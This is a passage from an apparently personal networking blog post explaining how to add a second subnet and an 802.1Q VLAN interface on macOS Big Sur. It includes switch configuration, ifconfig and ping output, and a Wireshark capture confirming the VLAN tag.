<span style="color: #ff6600;">127.0</span><span style="color: #555555;">.</span><span style="color: #ff6600;">0.1</span> <span style="color: #ff6600;">127.0</span><span style="color: #555555;">.</span><span style="color: #ff6600;">0.1</span> UH lo0
</pre></div><p><br /></p><p>To remove the route</p><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;">sudo route delete <span style="color: #ff6600;">10.29</span><span style="color: #555555;">.</span><span style="color: #ff6600;">2.0</span><span style="color: #555555;">/</span><span style="color: #ff6600;">24</span> <span style="color: #ff6600;">10.29</span><span style="color: #555555;">.</span><span style="color: #ff6600;">1.253</span></pre></div><p><b>Note</b>: The route won't be persistent. When you reboot it will be gone.</p><p><!--HTML generated using hilite.me--><!--HTML generated using hilite.me--><!--HTML generated using hilite.me--></p><p><br /></p><h4 id="2ndAdapter" style="text-align: left;">Add a second IP Subnet to a USB Ethernet adapter</h4><div>This is a common requirement for a network engineer but it's not intuitively obvious how to do it on Big Sur!</div><div><br /></div><div>For this example, I want to be able to send traffic on the 10.10.10.0/24 subnet.</div><div><br /></div><div>Follow these steps:</div><div><ul style="text-align: left;"><li>Open the Network Preferences app</li><li>Click the "+" sign on the bottom left to add a new service</li><li>Next to "Interface:" pick the USB Ethernet adapter</li><li>Next to "Service Name:" enter a descriptive name.</li><li>Click Create</li></ul></div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhetJKrfPD0NNWSAxmk8IU2bIwMfFeonZSdFbplc81Ndl0q81lOZhxvYT3ihQS5bw1Wg4qIHkOG6FpDKBfWKPAsSUydD-omJX7E8j8SRo_V-rEe9-hIBuAGlbAs04anYmVJOzR7nUpsFCfX/s411/network-service.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="162" data-original-width="411" height="196" id="id_75e2_d728_bf2_61cd" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhetJKrfPD0NNWSAxmk8IU2bIwMfFeonZSdFbplc81Ndl0q81lOZhxvYT3ihQS5bw1Wg4qIHkOG6FpDKBfWKPAsSUydD-omJX7E8j8SRo_V-rEe9-hIBuAGlbAs04anYmVJOzR7nUpsFCfX/w498-h196/network-service.png" style="height: auto; width: 498px;" width="498" /></a></div><br /><div>The new service will appear in the network preferences app. It will probably show as "Not Connected" because the default IP is set to DHCP. Change to "Manually" and enter the correct IP address, subnet and optionally a router IP. Click "Apply" to activate the change.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigidsALx96DxgpdI4vn31Fzjerkc2nP3IBlR8nSzzhwNCOBkoBCA6vpjHaik4R6VRRN7hs737YAxzRAyDwSiDSTl0hFYvAXYRyr6gm6kiYDw4tMK-pkXf875hPrIHVAohgT0-pMjsgG95V/s780/10.10.10.0.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="689" data-original-width="780" height="434" id="id_5d9c_902d_4475_fc21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigidsALx96DxgpdI4vn31Fzjerkc2nP3IBlR8nSzzhwNCOBkoBCA6vpjHaik4R6VRRN7hs737YAxzRAyDwSiDSTl0hFYvAXYRyr6gm6kiYDw4tMK-pkXf875hPrIHVAohgT0-pMjsgG95V/w490-h434/10.10.10.0.png" style="height: auto; width: 490px;" width="490" /></a></div>This is what the interface looks like in the terminal:<div><div><br /></div><div><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">en9: flags<span style="color: #555555;">=</span><span style="color: #ff6600;">8963</span><span style="color: #555555;"><</span>UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST<span style="color: #555555;">></span> mtu <span style="color: #ff6600;">1500</span>
options<span style="color: #555555;">=</span><span style="color: #ff6600;">6467</span><span style="color: #555555;"><</span>RXCSUM,TXCSUM,VLAN_MTU,TSO4,TSO6,CHANNEL_IO,PARTIAL_CSUM,ZEROINVERT_CSUM<span style="color: #555555;">></span>
ether <span style="color: #ff6600;">00</span>:e0:<span style="color: #ff6600;">4</span>c:<span style="color: #ff6600;">68</span>:<span style="color: #ff6600;">0</span>a:ab
inet6 fe80::d6:bc89:db67:<span style="color: #ff6600;">96</span>ee<span style="color: #555555;">%</span>en9 prefixlen <span style="color: #ff6600;">64</span> secured scopeid <span style="color: #ff6600;">0x16</span>
inet <span style="color: #ff6600;">10.253</span><span style="color: #555555;">.</span><span style="color: #ff6600;">7.100</span> netmask <span style="color: #ff6600;">0xfffffc00</span> broadcast <span style="color: #ff6600;">10.253</span><span style="color: #555555;">.</span><span style="color: #ff6600;">7.255</span>
inet <span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.100</span> netmask <span style="color: #ff6600;">0xffffff00</span> broadcast <span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.255</span>
nd6 options<span style="color: #555555;">=</span><span style="color: #ff6600;">201</span><span style="color: #555555;"><</span>PERFORMNUD,DAD<span style="color: #555555;">></span>
media: autoselect (<span style="color: #ff6600;">1000</span>baseT <span style="color: #555555;"><</span>full<span style="color: #555555;">-</span>duplex<span style="color: #555555;">></span>)
status: active
</pre></div>
<h4 style="text-align: left;"><br /></h4><div><br /></div><h3 id="tagging" style="text-align: left;">Adding Vlan tagging</h3><div>Again, Big Sur makes this easy but not obvious! In the network preferences app, click the funny little icon that looks like a circle with 3 dots in it:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8amRpW8QZZd6wwT317LkSvWHQ7MUKffnLMnV_UtZt6-_d0-jZEDuTVnHWc0BjCHd7oah3aIM38V7JKh-YjBynevtXd5vvw1py9AV2QyLLlj9uXoznV0j4mN6Ke5Bcc4GGm0lgZQNydv8R/s179/Screen+Shot+2021-04-18+at+13.03.52.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="48" data-original-width="179" id="id_6d57_9cd6_a530_f337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8amRpW8QZZd6wwT317LkSvWHQ7MUKffnLMnV_UtZt6-_d0-jZEDuTVnHWc0BjCHd7oah3aIM38V7JKh-YjBynevtXd5vvw1py9AV2QyLLlj9uXoznV0j4mN6Ke5Bcc4GGm0lgZQNydv8R/s0/Screen+Shot+2021-04-18+at+13.03.52.png" style="height: auto; width: 179px;" /></a></div><br /><div><ul style="text-align: left;"><li>Click on "Manage Virtual Interfaces..."</li></ul></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdNf-pEYjafShftTQBC1hfdN3JhgLLO7dtkrzPsodAz07r17FLr2oZIiDlWfmzgwMq4G-oLKPHmM2Az8i7wBT7PalJ4o2AVL53-6XmUZx27Si4l3idIptVglH0v-crKGC00vrc5mnabdlv/s249/Screen+Shot+2021-04-18+at+14.11.53.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="221" data-original-width="249" id="id_2792_8f9c_6431_eaf0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdNf-pEYjafShftTQBC1hfdN3JhgLLO7dtkrzPsodAz07r17FLr2oZIiDlWfmzgwMq4G-oLKPHmM2Az8i7wBT7PalJ4o2AVL53-6XmUZx27Si4l3idIptVglH0v-crKGC00vrc5mnabdlv/s0/Screen+Shot+2021-04-18+at+14.11.53.png" style="height: auto; width: 249px;" /></a></div><br /><div><br /></div><div><br /></div><div><ul style="text-align: left;"><li>Click the "+" sign</li><li>Click on "New Vlan..."</li></ul></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS5CqD1f5v-dchWx9SXWLUko4JkcqvKkDzldzIWWzOW5SQqmQX4osOIJ2QoFNmwkhA_gQ5rtUC20s49Y8VaCZ9dy54tOmxu-VaBb0Xv_XkrJSBnVvkpsUCk94u4PzEXvl5RrWi9OiHhsxQ/s168/Screen+Shot+2021-04-18+at+13.06.09.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="102" data-original-width="168" id="id_5773_ac20_651_d189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS5CqD1f5v-dchWx9SXWLUko4JkcqvKkDzldzIWWzOW5SQqmQX4osOIJ2QoFNmwkhA_gQ5rtUC20s49Y8VaCZ9dy54tOmxu-VaBb0Xv_XkrJSBnVvkpsUCk94u4PzEXvl5RrWi9OiHhsxQ/s0/Screen+Shot+2021-04-18+at+13.06.09.png" style="height: auto; width: 168px;" /></a></div><br /><div><br /></div><div><br /></div><div style="text-align: left;">In this example, I need to add Vlan 100</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><ul style="text-align: left;"><li>Next to "Vlan Name:" enter a descriptive name</li><li>Next to "Tag:" enter 100</li><li>Make sure "Interface:" is the USB 10/100/100 LAN</li><li>Click Create</li></ul></div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBniwIppm161la8kfjmOF4NNSplOvAWSyqfan_TH0olVsdMCeHIC-DGLNYT0rPuA4ZYNXvz3l-aZVAHwH3O47oVTAtptda0qMMl3QAaYvTnci0XK3u6r_4p0TNbavjULT_IiO1sNQ55JDe/s411/Screen+Shot+2021-04-18+at+13.09.27.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="163" data-original-width="411" height="180" id="id_53b8_af81_917f_63b8" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBniwIppm161la8kfjmOF4NNSplOvAWSyqfan_TH0olVsdMCeHIC-DGLNYT0rPuA4ZYNXvz3l-aZVAHwH3O47oVTAtptda0qMMl3QAaYvTnci0XK3u6r_4p0TNbavjULT_IiO1sNQ55JDe/w454-h180/Screen+Shot+2021-04-18+at+13.09.27.png" style="height: auto; width: 454px;" width="454" /></a></div><br /><div style="text-align: left;"><br /></div><div style="text-align: left;">The new interface will show up in the network preferences app. </div><div style="text-align: left;"><br /></div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh19VAfQG-AJTZEvIuTJYx_Bqoprbrs5NOdkiQ5F-kV2vIyOCfqUp8TjyRtWFje9xqBdM2MP9LDe8mPCj6IyRRiY8yYjHdAbDGn2xA3OVHx1JqWQ2wg5qoOkibnn7DdcTW905s1SG3gZQXB/s780/Screen+Shot+2021-04-18+at+13.12.40.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="689" data-original-width="780" height="415" id="id_231a_e3c7_f4f7_4428" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh19VAfQG-AJTZEvIuTJYx_Bqoprbrs5NOdkiQ5F-kV2vIyOCfqUp8TjyRtWFje9xqBdM2MP9LDe8mPCj6IyRRiY8yYjHdAbDGn2xA3OVHx1JqWQ2wg5qoOkibnn7DdcTW905s1SG3gZQXB/w470-h415/Screen+Shot+2021-04-18+at+13.12.40.png" style="height: auto; width: 470px;" width="470" /></a></div></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">One annoying trait is that the interface will be named Vlan0 on the system no matter what Vlan tag you assigned. Output from ifconfig:</div><div style="text-align: left;"><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">vlan0: flags<span style="color: #555555;">=</span><span style="color: #ff6600;">8843</span><span style="color: #555555;"><</span>UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST<span style="color: #555555;">></span> mtu <span style="color: #ff6600;">1500</span>
options<span style="color: #555555;">=</span><span style="color: #ff6600;">6063</span><span style="color: #555555;"><</span>RXCSUM,TXCSUM,TSO4,TSO6,PARTIAL_CSUM,ZEROINVERT_CSUM<span style="color: #555555;">></span>
ether <span style="color: #ff6600;">00</span>:e0:<span style="color: #ff6600;">4</span>c:<span style="color: #ff6600;">68</span>:<span style="color: #ff6600;">0</span>a:ab
inet6 fe80::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d<span style="color: #555555;">%</span>vlan0 prefixlen <span style="color: #ff6600;">64</span> secured scopeid <span style="color: #ff6600;">0x18</span>
inet <span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.100</span> netmask <span style="color: #ff6600;">0xffffff00</span> broadcast <span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.255</span>
nd6 options<span style="color: #555555;">=</span><span style="color: #ff6600;">201</span><span style="color: #555555;"><</span>PERFORMNUD,DAD<span style="color: #555555;">></span>
vlan: <span style="color: #ff6600;">100</span> parent interface: en9
media: autoselect (<span style="color: #ff6600;">1000</span>baseT <span style="color: #555555;"><</span>full<span style="color: #555555;">-</span>duplex<span style="color: #555555;">></span>)
status: active
</pre></div>
<div style="text-align: left;"><br /></div><br /><div style="text-align: left;"><br /></div><div style="text-align: left;">Here is the switch port configuration that the USB adapter is connected to:</div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">interface <span style="color: #ff6600;">1</span>
name <span style="color: #cc3300;">"Uplink"</span>
tagged vlan <span style="color: #ff6600;">86</span>,<span style="color: #ff6600;">100</span>
exit
</pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Here is the Vlan 100 configuration:</div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">vlan <span style="color: #ff6600;">100</span>
name <span style="color: #cc3300;">"Management"</span>
tagged <span style="color: #ff6600;">1</span>
untagged <span style="color: #ff6600;">3</span><span style="color: #555555;">-</span><span style="color: #ff6600;">24</span>
ip address <span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.254</span> <span style="color: #ff6600;">255.255</span><span style="color: #555555;">.</span><span style="color: #ff6600;">255.0</span>
exit
</pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div>Here are the ping results:</div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">ping <span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.254</span>
PING <span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.254</span> (<span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.254</span>): <span style="color: #ff6600;">56</span> data <span style="color: #336666;">bytes</span>
<span style="color: #ff6600;">64</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.254</span>: icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">0</span> ttl<span style="color: #555555;">=</span><span style="color: #ff6600;">255</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">2.447</span> ms
<span style="color: #ff6600;">64</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.254</span>: icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">1</span> ttl<span style="color: #555555;">=</span><span style="color: #ff6600;">255</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">1.624</span> ms
<span style="color: #555555;">^</span>C
<span style="color: #555555;">---</span> <span style="color: #ff6600;">10.10</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.254</span> ping statistics <span style="color: #555555;">---</span>
<span style="color: #ff6600;">2</span> packets transmitted, <span style="color: #ff6600;">2</span> packets received, <span style="color: #ff6600;">0.0</span><span style="color: #555555;">%</span> packet loss
<span style="color: #336666;">round</span><span style="color: #555555;">-</span>trip <span style="color: #336666;">min</span><span style="color: #555555;">/</span>avg<span style="color: #555555;">/</span><span style="color: #336666;">max</span><span style="color: #555555;">/</span>stddev <span style="color: #555555;">=</span> <span style="color: #ff6600;">1.624</span><span style="color: #555555;">/</span><span style="color: #ff6600;">2.035</span><span style="color: #555555;">/</span><span style="color: #ff6600;">2.447</span><span style="color: #555555;">/</span><span style="color: #ff6600;">0.412</span> ms
</pre></div>
<div><br /></div><div><br /></div><h4 style="text-align: left;">Using Wireshark to verify the Vlan tagging</h4><div>Wireshark on macOS can capture traffic and show the Vlan ID but there is a caveat. Even though we created the Vlan0 service and set it to Vlan 100, you must select the parent interface in wireshark. In our case that is en9.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIuBgORL9Ce2AfqHF7E853gsmQfSa_Tbr3tIP_5j_rsiWJLrSf0-HFCdjK37e7Mh4cuaOd6TbAubHFx1Py-oPV5TDFDT1xDlTnMehaymxti8MX_9ir9_GSL73MiZvLDAclg0SggFXAf4Rb/s366/Screen+Shot+2021-04-18+at+14.07.49.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="334" data-original-width="366" id="id_21f1_fb5b_9440_ca12" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIuBgORL9Ce2AfqHF7E853gsmQfSa_Tbr3tIP_5j_rsiWJLrSf0-HFCdjK37e7Mh4cuaOd6TbAubHFx1Py-oPV5TDFDT1xDlTnMehaymxti8MX_9ir9_GSL73MiZvLDAclg0SggFXAf4Rb/s320/Screen+Shot+2021-04-18+at+14.07.49.png" style="height: auto; width: 320px;" width="320" /></a></div><br /><div><br /></div><div>Notice that VLAN100: vlan0 and USB 10/100/1000: en9 show the same amount of traffic in the wireshark capture display.</div><div><br /></div><div><br /></div><div>Here is a snippet of traffic showing that it is indeed tagged on Vlan 100</div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">Ethernet II, Src: HewlettP_fe:<span style="color: #ff6600;">88</span>:<span style="color: #ff6600;">80</span> (<span style="color: #ff6600;">98</span>:f2:b3:fe:<span style="color: #ff6600;">88</span>:<span style="color: #ff6600;">80</span>), Dst: RealtekS_68:<span style="color: #ff6600;">0</span>a:ab (<span style="color: #ff6600;">00</span>:e0:<span style="color: #ff6600;">4</span>c:<span style="color: #ff6600;">68</span>:<span style="color: #ff6600;">0</span>a:ab)
Destination: RealtekS_68:<span style="color: #ff6600;">0</span>a:ab (<span style="color: #ff6600;">00</span>:e0:<span style="color: #ff6600;">4</span>c:<span style="color: #ff6600;">68</span>:<span style="color: #ff6600;">0</span>a:ab)
Address: RealtekS_68:<span style="color: #ff6600;">0</span>a:ab (<span style="color: #ff6600;">00</span>:e0:<span style="color: #ff6600;">4</span>c:<span style="color: #ff6600;">68</span>:<span style="color: #ff6600;">0</span>a:ab)
<span style="color: #555555;">....</span> <span style="color: #555555;">..</span><span style="color: #ff6600;">0.</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">=</span> LG bit: Globally unique address (factory default)
<span style="color: #555555;">....</span> <span style="color: #555555;">...</span><span style="color: #ff6600;">0</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">=</span> IG bit: Individual address (unicast)
Source: HewlettP_fe:<span style="color: #ff6600;">88</span>:<span style="color: #ff6600;">80</span> (<span style="color: #ff6600;">98</span>:f2:b3:fe:<span style="color: #ff6600;">88</span>:<span style="color: #ff6600;">80</span>)
Address: HewlettP_fe:<span style="color: #ff6600;">88</span>:<span style="color: #ff6600;">80</span> (<span style="color: #ff6600;">98</span>:f2:b3:fe:<span style="color: #ff6600;">88</span>:<span style="color: #ff6600;">80</span>)
<span style="color: #555555;">....</span> <span style="color: #555555;">..</span><span style="color: #ff6600;">0.</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">=</span> LG bit: Globally unique address (factory default)
<span style="color: #555555;">....</span> <span style="color: #555555;">...</span><span style="color: #ff6600;">0</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">=</span> IG bit: Individual address (unicast)
Type: <span style="color: #ff6600;">802.1</span>Q Virtual LAN (<span style="color: #ff6600;">0x8100</span>)
<span style="color: #ff6600;">802.1</span>Q Virtual LAN, PRI: <span style="color: #ff6600;">0</span>, DEI: <span style="color: #ff6600;">0</span>, ID: <span style="color: #ff6600;">100</span>
<span style="color: #ff6600;">000.</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">=</span> Priority: Best Effort (default) (<span style="color: #ff6600;">0</span>)
<span style="color: #555555;">...</span><span style="color: #ff6600;">0</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">....</span> <span style="color: #555555;">=</span> DEI: Ineligible
<span style="color: #555555;">....</span> <span style="color: #ff6600;">0000</span> <span style="color: #ff6600;">0110</span> <span style="color: #ff6600;">0100</span> <span style="color: #555555;">=</span> ID: <span style="color: #ff6600;">100</span>
Type: IPv4 (<span style="color: #ff6600;">0x0800</span>)
</pre></div>
<div><br /></div><div><br /></div><h3 id="IPv6" style="text-align: left;">A word about IPv6</h3><div>If you look back at the output of <b>ifconfig</b> for the vlan0 interface you will notice an IPv6 address was created but it ends in %vlan0.</div><div><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">inet6 fe80::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d<span style="color: #555555;">%</span>vlan0 prefixlen <span style="color: #ff6600;">64</span> secured scopeid <span style="color: #ff6600;">0x18</span>
</pre></div>
<div><br /></div><div><br /></div><div>To ping that interface we would use:</div><div><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">ping6 <span style="color: #555555;">-</span>I vlan0 fe80::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d
PING6(<span style="color: #ff6600;">56</span><span style="color: #555555;">=</span><span style="color: #ff6600;">40</span><span style="color: #555555;">+</span><span style="color: #ff6600;">8</span><span style="color: #555555;">+</span><span style="color: #ff6600;">8</span> <span style="color: #336666;">bytes</span>) fe80::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d<span style="color: #555555;">%</span>vlan0 <span style="color: #555555;">--></span> fe80::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d<span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">0</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">0.158</span> ms
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d<span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">1</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">0.262</span> ms
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d<span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">2</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">0.228</span> ms
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d<span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">3</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">0.340</span> ms
</pre></div>
<div><br /></div><div><br /></div><div>Using show management on the switch will list it's IPv6 address</div><div><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">Address <span style="color: #555555;">|</span> Address
Origin <span style="color: #555555;">|</span> IPv6 Address<span style="color: #555555;">/</span>Prefix Length Status
<span style="color: #555555;">----------</span> <span style="color: #555555;">+</span> <span style="color: #555555;">-------------------------------------------</span> <span style="color: #555555;">-----------</span>
autoconfig <span style="color: #555555;">|</span> fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">/</span><span style="color: #ff6600;">64</span> preferred
</pre></div>
<div><br /></div><div><br /></div><div>Let's see if we can ping the switch on Vlan 100 using IPv6:</div><div><br /></div><div --="" generated="" hilite.me="" html="" using=""><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">ping6 <span style="color: #555555;">-</span>I vlan0 fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span>
PING6(<span style="color: #ff6600;">56</span><span style="color: #555555;">=</span><span style="color: #ff6600;">40</span><span style="color: #555555;">+</span><span style="color: #ff6600;">8</span><span style="color: #555555;">+</span><span style="color: #ff6600;">8</span> <span style="color: #336666;">bytes</span>) fe80::<span style="color: #ff6600;">27</span>:<span style="color: #ff6600;">216</span>d:<span style="color: #ff6600;">4729</span>:<span style="color: #ff6600;">6</span>c0d<span style="color: #555555;">%</span>vlan0 <span style="color: #555555;">--></span> fe80::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span>
<span style="color: #ff6600;">16</span> <span style="color: #336666;">bytes</span> <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">fe80</span>::<span style="color: #ff6600;">9</span>af2:b3ff:fefe:<span style="color: #ff6600;">8880</span><span style="color: #555555;">%</span>vlan0, icmp_seq<span style="color: #555555;">=</span><span style="color: #ff6600;">0</span> hlim<span style="color: #555555;">=</span><span style="color: #ff6600;">64</span> time<span style="color: #555555;">=</span><span style="color: #ff6600;">3.237</span> ms
